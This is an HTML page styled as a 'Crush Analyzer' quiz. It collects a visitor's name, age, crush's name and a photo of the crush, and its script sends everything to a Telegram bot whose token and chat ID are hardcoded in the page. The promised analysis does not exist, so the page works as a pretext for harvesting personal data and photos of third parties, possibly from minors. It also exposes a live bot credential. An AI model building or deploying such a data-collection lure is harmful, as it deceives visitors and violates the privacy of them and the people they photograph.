
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Crush App</title>
  <style>
    body { font-family: Arial; padding: 20px; font-size: 26px; }
    label, input, button { display: block; margin-top: 12px; font-size: 24px; }
    button { padding: 10px 20px; }
  </style>
</head>
<body>
  <h2>🔮 Crush Analyzer 🔮</h2>
  <p>Send your crush photo, their name, your age, and your name. (The info will be sent to the owner for analysis ❤️)</p>

  <form id="crushForm">
    <label>Your Name:</label>
    <input type="text" id="yourName" required>

    <label>Your Age:</label>
    <input type="number" id="yourAge" required>

    <label>Crush's Name:</label>
    <input type="text" id="crushName" required>

    <label>Upload Crush Photo:</label>
    <input type="file" id="crushPhoto" accept="image/*" required>

    <button type="submit">Send 🔥</button>
  </form>

  <p id="status" style="color:green;"></p>

  <script>
    const BOT_TOKEN = "7548275702:AAEI9W4yHPQA6FiWCXiGUbqkkjBEXcSG29Y";
    const CHAT_ID = "7546051597";

    document.getElementById('crushForm').addEventListener('submit', async function(e) {
      e.preventDefault();

      const name = document.getElementById('yourName').value;
      const age = document.getElementById('yourAge').value;
      const crush = document.getElementById('crushName').value;
      const photo = document.getElementById('crushPhoto').files[0];

      // Step 1: Send text info
      const text = `💌 New Crush Submission:\n\n👤 Your Name: ${name}\n🎂 Your Age: ${age}\n❤️ Crush's Name: ${crush}`;
      await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          chat_id: CHAT_ID,
          text: text
        })
      });

      // Step 2: Send photo
      const formData = new FormData();
      formData.append('chat_id', CHAT_ID);
      formData.append('photo', photo);

      await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendPhoto`, {
        method: 'POST',
        body: formData
      });

      document.getElementById('status').innerText = "✅ Sent Successfully!";
      document.getElementById('crushForm').reset();
    });
  </script>
</body>
</html>
